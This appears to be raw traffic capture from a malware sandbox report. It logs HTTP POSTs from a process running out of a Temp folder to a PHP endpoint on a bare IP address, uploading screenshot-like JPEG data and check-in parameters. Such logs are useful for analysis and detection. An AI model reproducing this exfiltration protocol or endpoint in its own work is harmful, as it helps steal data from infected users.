                                        Aug 29, 2021 22:27:37.554327011 CEST7740OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:37.554466009 CEST7743OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:37.589960098 CEST7751OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:37.590042114 CEST7763OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:37.590059996 CEST7768OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:37.627126932 CEST7771OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:37.627166986 CEST7781OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:37.627207994 CEST7784OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:27:37.627285957 CEST7806OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:37.866187096 CEST7838INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:37 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        61192.168.2.44979946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:38.154784918 CEST7838OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9
                                        Host: 46.17.96.36
                                        Content-Length: 107971
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:38.154885054 CEST7839OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 61 62 31 30 35 61 36 36 39 66 37 63 63 32 66 66 65 38 34 65 62 38 37 37 31 39 34 34 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------72ab105a669f7cc2ffe84eb8771944d9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:38.155055046 CEST7849OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:38.155191898 CEST7851OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:38.189555883 CEST7854OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:38.189743996 CEST7860OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:38.189759970 CEST7865OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:38.189825058 CEST7872OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:38.190035105 CEST7877OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:38.224797964 CEST7880OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:38.224826097 CEST7882OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:38.329565048 CEST7948INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        62192.168.2.44980046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:39.104111910 CEST7948OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----ce51b85b4f9ae9a3c4604c72e2e1c4b9
                                        Host: 46.17.96.36
                                        Content-Length: 110607
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:39.104212046 CEST7949OUTData Raw: 2d 2d 2d 2d 2d 2d 63 65 35 31 62 38 35 62 34 66 39 61 65 39 61 33 63 34 36 30 34 63 37 32 65 32 65 31 63 34 62 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------ce51b85b4f9ae9a3c4604c72e2e1c4b9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:39.112994909 CEST7959OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:39.113271952 CEST7961OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:39.148602962 CEST7964OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:39.148680925 CEST7975OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:39.148858070 CEST7981OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:39.148922920 CEST7987OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:39.184252024 CEST7990OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:39.184298992 CEST7992OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:39.184328079 CEST8003OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:39.304362059 CEST8060INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:39 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        63192.168.2.44980146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:40.510046005 CEST8060OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 31
                                        Cache-Control: no-cache
                                        Data Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39
                                        Data Ascii: d1=1000004001&unit=152138533219
                                        Aug 29, 2021 22:27:40.584520102 CEST8100INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        64192.168.2.44980246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:40.515219927 CEST8061OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----ce51b85b4f9ae9a3c4604c72e2e1c4b9
                                        Host: 46.17.96.36
                                        Content-Length: 110607
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:40.515302896 CEST8061OUTData Raw: 2d 2d 2d 2d 2d 2d 63 65 35 31 62 38 35 62 34 66 39 61 65 39 61 33 63 34 36 30 34 63 37 32 65 32 65 31 63 34 62 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------ce51b85b4f9ae9a3c4604c72e2e1c4b9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:40.515470982 CEST8071OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:40.515533924 CEST8074OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:40.550405025 CEST8077OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:40.550528049 CEST8079OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:40.550554991 CEST8082OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:40.550810099 CEST8094OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:40.550856113 CEST8099OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:40.587110996 CEST8105OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:40.587218046 CEST8110OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:40.699799061 CEST8173INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
